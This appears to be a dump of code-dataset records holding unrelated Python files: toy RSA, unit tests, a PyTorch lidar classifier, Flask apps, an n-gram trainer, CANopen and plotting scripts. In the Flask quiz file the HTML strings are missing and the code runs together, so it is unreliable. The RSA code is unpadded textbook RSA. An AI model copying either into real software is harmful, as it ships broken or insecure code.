p = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n q = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n while q == p:\n q = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n n = p * q\n phi = (p - 1) * (q - 1)\n\n e = randrange(phi)\n while gcd(e, phi) != 1:\n e = randrange(phi)\n\n d = multiplicative_inverse(e, phi)\n \n if verbose == True:\n print(\"p = %d\" % p)\n print(\"q = %d\" % q)\n print(\"n = %d\" % n)\n print(\"phi = %d\" % phi)\n print(\"e = %d\" % e)\n print(\"d = %d\" % d)\n\n return KeyPair(public=Key(e, n), private=Key(d, n))\n\ndef encrypt(message, public_key):\n \"\"\"Encripta uma string mensagem aplicando uma chave pública RSA.\"\"\"\n chunk_size = int(log(public_key.mod, 256))\n binary_message = b64encode(message.encode())\n result = []\n \n for i in range(0, len(binary_message), chunk_size):\n chunk = binary_message[i:i+chunk_size]\n plain = 0\n for byte in reversed(chunk):\n plain *= 256\n plain += byte\n coded = modular_pow(plain, public_key.exp, public_key.mod)\n result.append(hex(coded)[2:])\n return \":\".join(result)\n\ndef decrypt(cypher, private_key):\n \"\"\"Decripta um código aplicando uma chave privada RSA.\"\"\"\n result = []\n for chunk in cypher.split(\":\"):\n coded = int(chunk, 16)\n plain = modular_pow(coded, private_key.exp, private_key.mod)\n result.append(plain % 256)\n while plain > 0:\n plain = plain // 256\n result.append(plain % 256)\n return b64decode(bytes(result)).decode()\n\ndef main():\n keys = generate_keys(True)\n print()\n\n print(\"Public key =\", keys.public)\n print(\"Private key =\", keys.private)\n print()\n\n message = \"Isto é uma mensagem em português. àÀáÁãÃçÇéÉêÊÍíóÓúÚüÜ\"\n print(\"message = \\\"%s\\\"\" % message)\n print()\n\n cypher = encrypt(message, keys.public)\n print(\"cypher =\", cypher)\n print()\n\n decrypted = decrypt(cypher, keys.private)\n print(\"decrypted = \\\"%s\\\"\" % decrypted)\n print()\n\n assert message == decrypted\n\nif __name__ == '__main__':\n main()","sub_path":"rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"79137217","text":"import unittest\nfrom ctci.c2.p21 import dedups\nfrom ds.linkedlist import LinkedListNode\n\nclass TestDedups(unittest.TestCase):\n\n def test_dedups_none(self):\n head = None\n dedups(head)\n self.assertTrue(head is None)\n\n def test_dedups_one(self):\n head = LinkedListNode(0, None)\n dedups(head)\n self.assertTrue(head.next is None)\n\n","sub_path":"ctci/c2/test_p21.py","file_name":"test_p21.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"16902107","text":"# -*- coding: utf-8 -*-\n\nimport time\n\ndef main():\n i = 0\n while i <= 10000:\n print (i)\n i += 1\n\nif __name__ == \"__main__\":\n \n #簡単に処理時間を計測してみる\n start = time.time()\n \n main()\n\n elapsedTime = time.time() - start\n\n print(\"処理速度:{0}\".format(elapsedTime))\n","sub_path":"Other/elapsed_time.py","file_name":"elapsed_time.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"402449910","text":"import os\r\nimport shutil\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nfrom torchvision import datasets, transforms\r\nfrom torch.optim.lr_scheduler import StepLR\r\nimport subprocess\r\nfrom pathlib import Path\r\nimport random\r\n\r\nclass Net(nn.Module):\r\n def __init__(self):\r\n super(Net, self).__init__()\r\n \r\n #1 input image channel, 32 output channel, 3*3 square convolution kernel\r\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\r\n \r\n #32 input channels,64 output channedl, 3*3 square convolution kernel\r\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\r\n \r\n #nn.Dropout2d() will help promote independence between feature maps and should be used instead.\r\n #torch.nn.Dropout2d\r\n self.dropout1 = nn.Dropout2d(0.25)\r\n self.dropout2 = nn.Dropout2d(0.5)\r\n \r\n #apply a linear transformation to the incoming data:y=xA+b,torch.nn.Linear(in_features: int, out_features: int, bias: bool = True)\r\n self.fc1 = nn.Linear(12544, 128)\r\n self.fc2 = nn.Linear(128, 2)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n #print(\"Size after conv1:\",x.size())\r\n x = F.relu(x)\r\n x = self.conv2(x)\r\n x = F.relu(x)\r\n #print(\"Size after cov2:\",x.size())\r\n x = F.max_pool2d(x, 2)\r\n\r\n #print(\"Size after pooling:\",x.size())\r\n x = self.dropout1(x)\r\n \r\n #Flattens a contiguous range of dims in a tensor\r\n x = torch.flatten(x, 1)\r\n #print(\"Size after flattern:\", x.size())\r\n \r\n x = self.fc1(x)\r\n x = F.relu(x)\r\n x = self.dropout2(x)\r\n x = self.fc2(x)\r\n output = F.log_softmax(x, dim=1)\r\n return output\r\n\r\ndef select_train_images(ins_list,em_data_path='lidar_converted_data/class_A',cr_data_path=\"lidar_converted_data/class_B\",em_destination='lidar_train_data/class_A',cr_destination='lidar_train_data/class_B'):\r\n num_cr=0\r\n num_em=0\r\n for ins in ins_list:\r\n if ins['cr']==\"crowded\":\r\n num_cr+=1\r\n elif ins['cr']==\"empty\":\r\n num_em+=1\r\n \r\n cr_image_list=os.listdir(cr_data_path)\r\n #print(cr_image_list)\r\n selected_cr_image_list=random.sample(cr_image_list,k=num_cr)\r\n \r\n em_image_list=os.listdir(em_data_path)\r\n #print(em_image_list)\r\n selected_em_image_list=random.sample(em_image_list,k=num_em)\r\n \r\n for f1 in selected_cr_image_list:\r\n shutil.copy(cr_data_path+\"/\"+f1,cr_destination)\r\n for f2 in selected_em_image_list:\r\n shutil.copy(em_data_path+\"/\"+f2,em_destination)\r\n \r\n print(\"Lidar train data is generated\")\r\n \r\ndef select_test_images(em_data_path='lidar_converted_data/class_A',cr_data_path=\"lidar_converted_data/class_B\",em_destination='lidar_test_data/class_A',cr_destination='lidar_test_data/class_B'):\r\n cr_image_list=os.listdir(cr_data_path)\r\n em_image_list=os.listdir(em_data_path)\r\n selected_em_image_list=random.sample(em_image_list,k=50)\r\n selected_cr_image_list=random.sample(cr_image_list,k=50)\r\n \r\n for f1 in selected_em_image_list:\r\n shutil.move(em_data_path+\"/\"+f1,em_destination)\r\n \r\n for f2 in selected_cr_image_list:\r\n shutil.move(cr_data_path+\"/\"+f2,cr_destination)\r\n\r\n print(\"Lidar test data is generated\")\r\n\r\ndef delete_train_images():\r\n shutil.rmtree(\"lidar_train_data/class_A\")\r\n shutil.rmtree(\"lidar_train_data/class_B\")\r\n os.makedirs(\"lidar_train_data/class_A\")\r\n os.makedirs(\"lidar_train_data/class_B\")\r\n \r\ndef delete_test_images():\r\n shutil.rmtree(\"lidar_test_data/class_A\")\r\n shutil.rmtree(\"lidar_test_data/class_B\")\r\n os.makedirs(\"lidar_test_data/class_A\")\r\n os.makedirs(\"lidar_test_data/class_B\")\r\n","sub_path":"perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"425748924","text":"import random\r\nimport os\r\nimport datetime\r\nimport json\r\nfrom flask import Flask,request,render_template,Response\r\n\r\n\r\napp = Flask(__name__)\r\n\r\ndatamain = {}\r\n\r\nclass session:\r\n def __init__(self,name):\r\n self.jsonfile = os.getcwd()\r\n self.time = datetime.datetime.now()\r\n self.quest = []\r\n self.answer = []\r\n self.useranswers = []\r\n self.stage = 0\r\n if os.path.exists(self.jsonfile + '/baza/' + name + \".json\"):\r\n with open(self.jsonfile + '/baza/' + name + \".json\",'r') as js:\r\n mainj = json.load(js)\r\n else:\r\n data = {\"id\": name, \"rightanswers\": 0}\r\n with open(self.jsonfile + '/baza/' + name + \".json\", 'w', encoding='UTF-8') as js:\r\n json.dump(data, js, ensure_ascii=False)\r\n self.questgenerate()\r\n\r\n def endthis(self):\r\n result = \"\"\r\n for a in range(5):\r\n if self.answer[a] == self.useranswers[a]:\r\n result += \"
\" + str((a+1)) + \".
\" + str((a+1)) + \".
\"\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n else:\r\n datamain[data['name']] = session(data['name'])\r\n datamain[data[\"name\"]].stage+=1\r\n dat = datamain[data[\"name\"]].quest[datamain[data[\"name\"]].stage] + \"
\"\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n elif data['type'] == 'r':\r\n datamain[data[\"name\"]].useranswers.append(data[\"answ\"])\r\n if(datamain[data[\"name\"]].stage != 5):\r\n datamain[data[\"name\"]].stage += 1\r\n dat = datamain[data[\"name\"]].quest[datamain[data[\"name\"]].stage] + \"
\"\r\n else:\r\n dat = datamain[data[\"name\"]].endthis()\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n #if request.method == 'GET':\r\n # print(request.args)\r\n #return render_template('index.html')\r\n","sub_path":"FuckYou.py","file_name":"FuckYou.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"271133869","text":"import config\nimport logging\nimport requests\n\nTREESTATUS_URL = 'https://treestatus.mozilla-releng.net/trees/'\n\nlogger = logging.getLogger('autoland')\n\n\ndef tree_is_open(tree):\n # treestatus running in dev/CI is an older version, with slightly\n # different request and response structures.\n is_test_env = config.testing()\n\n r = None\n try:\n if is_test_env:\n r = requests.get('http://treestatus/%s?format=json' % tree)\n else:\n r = requests.get(TREESTATUS_URL + tree)\n\n if r.status_code == 200:\n if is_test_env:\n return r.json()['status'] == 'open'\n else:\n return r.json()['result']['status'] == 'open'\n\n elif r.status_code == 404:\n # We assume unrecognized trees are open\n return True\n\n else:\n logger.error('Unexpected response from treestatus API '\n 'for tree \"%s\": %s' % (tree, r.status_code))\n except KeyError:\n logger.error('Malformed response from treestatus API '\n 'for tree \"%s\"' % tree)\n if r is not None:\n logger.debug(r.json())\n except Exception as e:\n logger.error('Failed to determine treestatus for %s: %s' % (tree, e))\n\n return False\n\n","sub_path":"autoland/autoland/treestatus.py","file_name":"treestatus.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"101876903","text":"T=10\nfor tc in range(T):\n num=int(input())\n exp=input()\n postfix=[]\n op=[]\n for i in exp:\n if i=='(':\n op.append(i)\n elif i==')':\n while op:\n if op[-1]=='(':\n op.pop()\n break\n postfix.append(op.pop())\n elif i=='+':\n if op and op[-1]=='*':\n while op:\n if op[-1]=='(':\n break\n postfix.append(op.pop())\n op.append(i)\n elif i=='*':\n op.append(i)\n else:\n postfix.append(i)\n while op:\n postfix.append(op.pop())\n stack=[]\n for i in postfix:\n if i=='*':\n stack.append(stack.pop()*stack.pop())\n elif i=='+':\n stack.append(stack.pop() + stack.pop())\n else:\n stack.append(int(i))\n print(f'#{tc+1} {stack[0]}')","sub_path":"1224.py","file_name":"1224.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"380569203","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 29 05:29:37 2021\n\n@author: lindemberg\n\"\"\"\n\nimport requests\nimport json \n\ndef formata_dados(dados_paises):\n sigla = \"\"\n pais = \"\"\n fronteiras = []\n dados_formatado = \"SIGLA | PAÍS\"+(16* \" \") + \"| FRONTEIRAS\\n\" \n \n for dados in dados_paises:\n sigla = dados[\"code\"]\n pais = dados[\"name\"]\n fronteiras = dados[\"fronteiras\"]\n dados_formatado += sigla +\" | \" + pais + (20-len(pais)) * \" \" + \"| \" + str(fronteiras) + \" - (\" + str(len(fronteiras)) +\" país(es) faz(em) fronteira)\\n\" \n \n return dados_formatado \n\ndef ordena_decrescente(dados_paises):\n for i in range(len(dados_paises)-1):\n for j in range(i+1,len(dados_paises)):\n if len(dados_paises[i][\"fronteiras\"]) < len(dados_paises[j][\"fronteiras\"]):\n dados_paises[i] , dados_paises[j] = dados_paises[j] , dados_paises[i]\n \n# captura os dados da API, seguido da lista de dados dos paises do tipo dicionário(dict)\ndados_paises = requests.get(\"http://www.amock.io/api/fcmaia/countries\")\nlista_de_dic_paises = json.loads(dados_paises.content)\n\n#mostra como os dados foram capturados sem uma ordenação \nprint(\"SEQUENCIA FORMATADA DOS DADOS CONFORME CAPTURADO DA API\")\nprint(formata_dados(lista_de_dic_paises))\n\n#realiza a ordenação em ordem descrescente, levando em consideração a quantidade de fronteiras que cada país tem\nordena_decrescente(lista_de_dic_paises)\n\n#mostra a lista ordenada \nprint(\"SEQUENCIA ORDENADA, CONFORME A QUANTIDADE DE FRONTEIRAS\")\nprint(formata_dados(lista_de_dic_paises))","sub_path":"fronteira.py","file_name":"fronteira.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"635505048","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Class, designed to search for sources.\n\"\"\"\n# built-ins\nimport os\nfrom pathlib import Path\nfrom typing import List, Optional, Generator, Tuple, Dict\n\n# modules of the project\nfrom essence.machine import settings\nfrom essence.machine.model.utils import find_metafiles, load_as_json, get_file_extension\nfrom essence.utils import exceptions\nfrom essence.utils.containeer_abstract import ContainerAbstract\nfrom essence.utils.common import s_type, decorate\nfrom essence.utils.helpers import Meta, Uri\n\nMetas = Dict[Uri, Meta]\n\n\nclass Locator(ContainerAbstract):\n \"\"\"Class, designed to search for sources.\n \"\"\"\n FILE_TYPE = 'yml'\n _bound_type = Meta\n _raise_on_absence = exceptions.MetaDoesNotExistError\n _raise_on_overwrite = exceptions.MetaAlreadyExistError\n\n def __init__(self, metas: Optional[Metas] = None) -> None:\n \"\"\"Instantiate.\n \"\"\"\n self._storage: Metas = metas or {}\n\n def __repr__(self) -> str:\n \"\"\"Return string representation.\n \"\"\"\n return s_type(self) + f'({self.FILE_TYPE})'\n\n def discover(self, path: Optional[Path] = None) -> None:\n \"\"\"Find and save meta instances for all metafiles.\n \"\"\"\n for meta in self.search_metafiles(path):\n self.add(meta)\n\n if not self:\n raise exceptions.NoStoriesFoundError(decorate(\n f'Not a single story has been found!'\n ))\n\n def search_metafiles(self, path: Optional[Path] = None) -> Generator[Meta, None, None]:\n \"\"\"Get metas for all folders with stories in them.\n \"\"\"\n metafiles = find_metafiles(path)\n\n for filename in metafiles:\n contents = load_as_json(filename)\n # noinspection PyArgumentList\n meta = self._bound_type(**contents, uri=filename.parent.name, path=filename)\n yield meta\n\n # pylint: disable=W0221\n def iterate_over_content(self, story_name: str) -> Generator[Tuple[str, Path], None, None]:\n \"\"\"Iterate over all filenames.\n \"\"\"\n for meta in self.values():\n if meta.uri != story_name:\n continue\n\n base_path = meta.path.parent\n\n for path, _, files in os.walk(str(base_path.absolute())):\n for file in files:\n full_path = Path(path) / file.lower()\n if (file != settings.META_FILE_NAME and\n get_file_extension(full_path) == self.FILE_TYPE):\n yield self.FILE_TYPE, full_path\n\n def get_stories(self) -> List[Tuple[str, str]]:\n \"\"\"Get uris and names for all known stories.\n \"\"\"\n titles = [(x.uri, x.name) for x in self.values()]\n return titles\n","sub_path":"essence/machine/model/locator.py","file_name":"locator.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"14599343","text":"import re\nimport sys\nfrom .common_errors import CommonErrors\nfrom .corpora import OANCCorpus, TestCorpus\nfrom .serial import Cereal\n\n\nclass Trainer:\n def __init__(self, reduced=True, corpus=OANCCorpus, corrections=True, serializer=Cereal):\n if corrections:\n self.corpus = corpus(errors=CommonErrors)\n else:\n self.corpus = corpus()\n self.reduced = reduced\n self.serializer = serializer()\n self.data = {}\n self.unigrams_list = []\n self.bigrams_list = []\n self.trigrams_list = []\n self.read_corpus()\n self.train()\n\n def read_corpus(self):\n for line in self.corpus.read_corpus():\n self.unigrams_list += self.words(line)\n self.bigrams_list += self.bigrams(line)\n self.trigrams_list += self.trigrams(line)\n\n def train(self):\n unigram_count = self.train_model(self.unigrams_list)\n bigram_count = self.train_model(self.bigrams_list)\n trigram_count = self.train_model(self.trigrams_list)\n if self.reduced:\n unigram_count = self.reduce(unigram_count)\n bigram_count = self.reduce(bigram_count)\n trigram_count = self.reduce(trigram_count)\n unigram_probs = self.get_probs(unigram_count)\n bigram_probs = self.get_probs(bigram_count)\n trigram_probs = self.get_probs(trigram_count)\n self.norm(unigram_probs)\n self.norm(bigram_probs)\n self.norm(trigram_probs)\n self.data['unigram_count'] = unigram_count\n self.data['unigram_probs'] = unigram_probs\n self.data['bigram_probs'] = bigram_probs\n self.data['trigram_probs'] = trigram_probs\n\n def reduce(self, count):\n new_count = {}\n for key, value in count.items():\n if value > 1:\n new_count[key] = value\n return new_count\n\n def pickle(self):\n name = self.corpus.name\n self.serializer.serialize(name, self.data)\n\n def norm(self, probs):\n pmax = max(probs.values())\n pmin = min(probs.values())\n denom = pmax - pmin\n if denom == 0:\n denom = 1\n for key, value in probs.items():\n probs[key] = ((value - pmin) / denom)\n\n def get_probs(self, count):\n prob_dict = {}\n denom = sum(count.values())\n for gram in count:\n prob_dict[gram] = (count[gram] / denom)\n return prob_dict\n\n def bigrams(self, text):\n l = []\n lines = filter(None, re.split('[.?!\\n]+', text))\n for line in lines:\n mod_line = [\"^\"] + self.words(line) + [\"$\"]\n for i in range(len(mod_line) - 1):\n l.append((mod_line[i], mod_line[i + 1]))\n return l\n\n def trigrams(self, text):\n l = []\n lines = filter(None, re.split('[.?!\\n]+', text))\n for line in lines:\n mod_line = [\"^\"] + self.words(line) + [\"$\"]\n for i in range(len(mod_line) - 2):\n l.append((mod_line[i], mod_line[i + 1], mod_line[i + 2]))\n return l\n\n def words(self, text):\n l = re.findall('[a-z\\']+', text.lower())\n return l\n\n def train_model(self, features):\n model = {}\n for f in features:\n if f in model:\n model[f] += 1\n else:\n model[f] = 1\n return model\n\n\ndef whathappened(time, unis, bis, tris):\n print(\"Took: \" + str(time) + \" seconds\")\n print(\"Added: \" + str(unis) + \" unigrams\")\n print(\"Added: \" + str(bis) + \" bigrams\")\n print(\"Added: \" + str(tris) + \" trigrams\")\n\nif __name__ == \"__main__\":\n import time\n corpus = OANCCorpus\n corrections = CommonErrors\n reduced = True\n if 'test' in sys.argv:\n corpus = TestCorpus\n corrections = None\n reduced = False\n start = time.clock()\n t = Trainer(corrections=corrections, corpus=corpus, reduced=reduced)\n t.pickle()\n end = time.clock() - start\n unis = len(t.data['unigram_probs'].keys())\n bis = len(t.data['bigram_probs'].keys())\n tris = len(t.data['trigram_probs'].keys())\n whathappened(end, unis, bis, tris)\n","sub_path":"app/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"191609057","text":"import matplotlib.pyplot as plt\n\n# set up x values and y values\n\nx_values = list(range(5000))\ny_values = [x**3 for x in x_values]\n\n# set the title of the plot\nplt.title('Cubic Values', fontsize=15)\n\n# set the axes of the plot\nplt.xlabel('Values', fontsize=10)\nplt.ylabel('Cubic Values', fontsize=10)\n\n# set the scale\nplt.tick_params(axis='both', which='major', labelsize=5)\n# draw the plot\nplt.scatter(x_values, y_values, c=y_values, cmap=plt.cm.Reds, s=20)\nplt.show()\n\n\n\n","sub_path":"practice/15.02_cubic_diagram.py","file_name":"15.02_cubic_diagram.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"163274178","text":"#!/usr/bin/python\nimport fresh_tomatoes\nimport media\n\n\ndef main():\n shawshank = media.Movie(\"The Shawshank Redemption\",\n \"An innocent man escapes from prison.\",\n 1994,\n \"http://ia.media-imdb.com/images/M/MV5BODU4MjU4N\" +\n \"jIwNl5BMl5BanBnXkFtZTgwMDU2MjEyMDE@._V1_SX214_A\" +\n \"L_.jpg\",\n \"https://www.youtube.com/watch?v=6hB3S9bIaco\",\n 9.3)\n\n love_actually = media.Movie(\"Love Actually\",\n \"Intertangled romance ensues over Christmas.\",\n 2003,\n \"http://ia.media-imdb.com/images/M/MV5BMTY4N\" +\n \"jQ5NDc0Nl5BMl5BanBnXkFtZTYwNjk5NDM3._V1_SX2\" +\n \"14_AL_.jpg\",\n \"https://www.youtube.com/watch?v=KdzH6a-XEGM\",\n 7.7)\n\n wedding_crashers = media.Movie(\"Wedding Crashers\",\n \"Two guys crash weddings and fall in love.\",\n 2005,\n \"http://ia.media-imdb.com/images/M/MV5BM\" +\n \"Tc4NTUyNzU4MV5BMl5BanBnXkFtZTcwMzcyMTky\" +\n \"MQ@@._V1_SX214_AL_.jpg\",\n \"https://www.youtube.com/watch?v=VYrEQbt\" +\n \"V2V4\",\n 7.0)\n\n amelie = media.Movie(\"Amelie\",\n \"A young eccentric French girl tries to find the\" +\n \" origin of some mysterious photos.\",\n 2001,\n \"http://ia.media-imdb.com/images/M/MV5BMTYzNjkxMT\" +\n \"czOF5BMl5BanBnXkFtZTgwODg5NDc2MjE@._V1_SY317_CR0,0\" +\n \",214,317_AL_.jpg\",\n \"https://www.youtube.com/watch?v=sECzJY07oK4\",\n 8.4)\n\n mohicans = media.Movie(\"The Last of the Mohicans\",\n \"An innocent man escapes from prison.\",\n 1992,\n \"http://ia.media-imdb.com/images/M/MV5BMTQ0MjQ5ND\" +\n \"AzMV5BMl5BanBnXkFtZTcwNjYzMjE2MQ@@._V1_SY317_CR8\" +\n \",0,214,317_AL_.jpg\",\n \"https://www.youtube.com/watch?v=yaQeVnN6pUc\",\n 7.8)\n\n once = media.Movie(\"Once\",\n \"Two buskers in Dublin are star-crossed.\",\n 2006,\n \"http://ia.media-imdb.com/images/M/MV5BMTEwNjExOTc2MT\" +\n \"JeQTJeQWpwZ15BbWU3MDYzODQ3NDE@._V1_SY317_CR0,0,214,3\" +\n \"17_AL_.jpg\",\n \"https://www.youtube.com/watch?v=FWJIylZ8VyM\",\n 7.9)\n\n my_faves = [shawshank, love_actually, wedding_crashers, amelie, mohicans,\n once]\n\n # Send my favorite movies to Fresh Tomatoes HTML generator\n fresh_tomatoes.open_movies_page(my_faves)\n\nif __name__ == '__main__':\n main()","sub_path":"entertainment_console.py","file_name":"entertainment_console.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"646283220","text":"from .sdo import SdoClient\nfrom .nmt import NmtMaster\nfrom .emcy import EmcyConsumer\nfrom .pdo import PdoNode\nfrom . import objectdictionary\n\n\nclass Node(object):\n \"\"\"A CANopen slave node.\n\n :param int node_id:\n Node ID (set to None or 0 if specified by object dictionary)\n :param object_dictionary:\n Object dictionary as either a path to a file, an ``ObjectDictionary``\n or a file like object.\n :type object_dictionary: :class:`str`, :class:`canopen.ObjectDictionary`\n \"\"\"\n\n def __init__(self, node_id, object_dictionary):\n self.network = None\n\n if not isinstance(object_dictionary,\n objectdictionary.ObjectDictionary):\n object_dictionary = objectdictionary.import_od(\n object_dictionary, node_id)\n self.object_dictionary = object_dictionary\n\n self.id = node_id or self.object_dictionary.node_id\n\n #: Enable WORKAROUND for reversed PDO mapping entries\n self.curtis_hack = False\n\n self.sdo = SdoClient(0x600 + self.id, 0x580 + self.id, object_dictionary)\n self.pdo = PdoNode(self)\n self.nmt = NmtMaster(self.id)\n self.emcy = EmcyConsumer()\n\n def associate_network(self, network):\n self.network = network\n self.sdo.network = network\n self.pdo.network = network\n self.nmt.network = network\n network.subscribe(self.sdo.tx_cobid, self.sdo.on_response)\n network.subscribe(0x700 + self.id, self.nmt.on_heartbeat)\n network.subscribe(0x80 + self.id, self.emcy.on_emcy)\n\n def remove_network(self):\n self.network.unsubscribe(self.sdo.tx_cobid)\n self.network.unsubscribe(0x700 + self.id)\n self.network.unsubscribe(0x80 + self.id)\n self.network = None\n self.sdo.network = None\n self.pdo.network = None\n self.nmt.network = None\n\n def store(self, subindex=1):\n \"\"\"Store parameters in non-volatile memory.\n\n :param int subindex:\n 1 = All parameters\\n\n 2 = Communication related parameters\\n\n 3 = Application related parameters\\n\n 4 - 127 = Manufacturer specific\n \"\"\"\n self.sdo.download(0x1010, subindex, b\"save\")\n\n def restore(self, subindex=1):\n \"\"\"Restore default parameters.\n\n :param int subindex:\n 1 = All parameters\\n\n 2 = Communication related parameters\\n\n 3 = Application related parameters\\n\n 4 - 127 = Manufacturer specific\n \"\"\"\n self.sdo.download(0x1011, subindex, b\"load\")\n","sub_path":"canopen/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"541157851","text":"from flask import render_template, request, jsonify, abort\nimport logging\nimport json\nimport os\nimport re\nfrom datetime import datetime, date\n\nfrom app import app\nfrom loggers import request_file_hendler\nfrom config import base_dir\n\n\ndef get_file_name(log_name):\n\t\"\"\"Return name of the file from app config error.log/request.log\"\"\"\n\tif log_name == 'errors':\n\t\treturn app.config['ERROR_LOG_FILE']\n\telse:\n\t\treturn app.config['REQUEST_LOG_FILE']\n\ndef get_error_name(stacktrace):\n\t\"\"\"Parse the stacktrace of error and return name of Error\"\"\"\n\tlines = stacktrace.split('\\n')\n\tlast_line = lines[len(lines) - 2]\n\tresult = re.search(r'^(\\w+Error)', last_line);\n\treturn result.group(0)\n\ndef get_list_of_errors(full_log, **kvargs):\n\t\"\"\"Return list of errors from error.log.\n\n\tKeyword arguments:\n\tfull_log -- string line containing full error.log\n\t**kvargs {\n\t\terrors_type -- list of errors which user enter in front (default \"\" i.e. All)\n\t\tdate -- datetime(%Y-%m-%d) date which user enter in front \n\t\t\t\t(in start date=\"\" i.e. All date, if user didn't enter date,\n\t\t\t\t date=today datetime(%Y-%m-%d))\n\t}\n\n\t\"\"\"\n\tfull_log += \"##\"\n\tsearch_result = re.findall(\n\t\tr'(\\d{2}\\:\\d{2}\\:\\d{2} \\d{2}\\/\\d{2}\\/\\d{4}) \\- (.*?)(Traceback .*?)##',\n\t\tfull_log, re.S)\n\t# For all type of errors create a list of dictionaries \n\t# with information about error.\n\tif not kvargs['errors_type']:\n\t\terrors = [{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t\"msg\": line[1], \n\t\t\t\t\t\"stacktrace\": line[2],\n\t\t\t\t\t\"error_name\": get_error_name(line[2])} for line in search_result] \n\t# Add a filter if error_name != errors_type, this error not add to result.\n\telse:\n\t\terrors = filter(lambda error: error[\"error_name\"] in kvargs['errors_type'],\n\t\t\t\t\t [{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t \"msg\": line[1], \n\t\t\t\t\t \"stacktrace\": line[2],\n\t\t\t\t\t \"error_name\": get_error_name(line[2])} for line in search_result])\n\t# Add a filter if error datetime != kvargs['date'], this error not add to result.\n\tif kvargs['date']:\n\t\terrors = filter(lambda error: \n\t\t\terror[\"datetime\"].strftime('%d %m %Y') == kvargs['date'].strftime('%d %m %Y'),\n\t\t\terrors)\n\n\t# Sorting result list by date (early -> late).\n\terrors.sort(key = lambda i: i[\"datetime\"], reverse=True)\n\treturn errors\n\ndef get_list_of_request(full_log, **kvargs):\n\t\"\"\"Return list of request from request.log.\n\n\tKeyword arguments:\n\tfull_log -- string line containing full error.log\n\t**kvargs {\n\t\tip -- string ip adress which interested by user (default \"\" i.e. All)\n\t\trequest_date -- datetime(%Y-%m-%d) date which user enter \n\t\t\t\t\t\tin front (default \"\" i.e. All)\n\t\tsn -- string number of counter which interested \n\t\t\t by user (default \"\" i.e. All)\n\t\tstart_date -- datetime(%Y-%m-%d) date which user \n\t\t\t\t\t enter in front (default \"\" i.e. All)\n\t}\n\tIf any of kvargs == \"\" filter of this mark will not work.\n\n\t\"\"\"\n\tfull_log += \"##\"\n\tsearch_result = re.findall(\n\t\tr'(\\d{2}\\:\\d{2}\\:\\d{2} \\d{2}\\/\\d{2}\\/\\d{4}) \\- (\\d+\\.\\d+\\.\\d+\\.\\d+)\\n(.*?)\\n##', \n\t\tfull_log, re.S)\n\t# Create a list of dictionaries with information \n\t# about request(date, ip, counter info).\n\trequests = [{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t\"ip\": line[1],\n\t\t\t\t\t\"request_body\": json.loads(line[2])} for line in search_result] \n\n\t# Translate readout_dt \"1465193586\" --> \"2016-06-06\" in all measurments.\t\t\t\t\t\n\tfor request in requests:\n\t\tfor counter in request.get(\"request_body\").get(\"data\"):\n\t\t\tcounter[\"readout_dt\"] = (date.fromtimestamp(int(counter[\"readout_dt\"])))\n\n\t# Add a filter if request ip != kvargs[\"ip\"], this request not add to result.\n\tif kvargs[\"ip\"]:\n\t\trequests = filter(lambda request: request[\"ip\"] == kvargs[\"ip\"], requests)\n\n\t# Add a filter if request[\"datetime\"] != kvargs['request_date'], this error not add to result.\t\n\tif kvargs['request_date']:\n\t\trequests = filter(lambda request: \n\t\t\trequest[\"datetime\"].strftime('%d %m %Y') == kvargs['request_date'].strftime('%d %m %Y'), \n\t\t\trequests)\n\n\t# Add a filter if 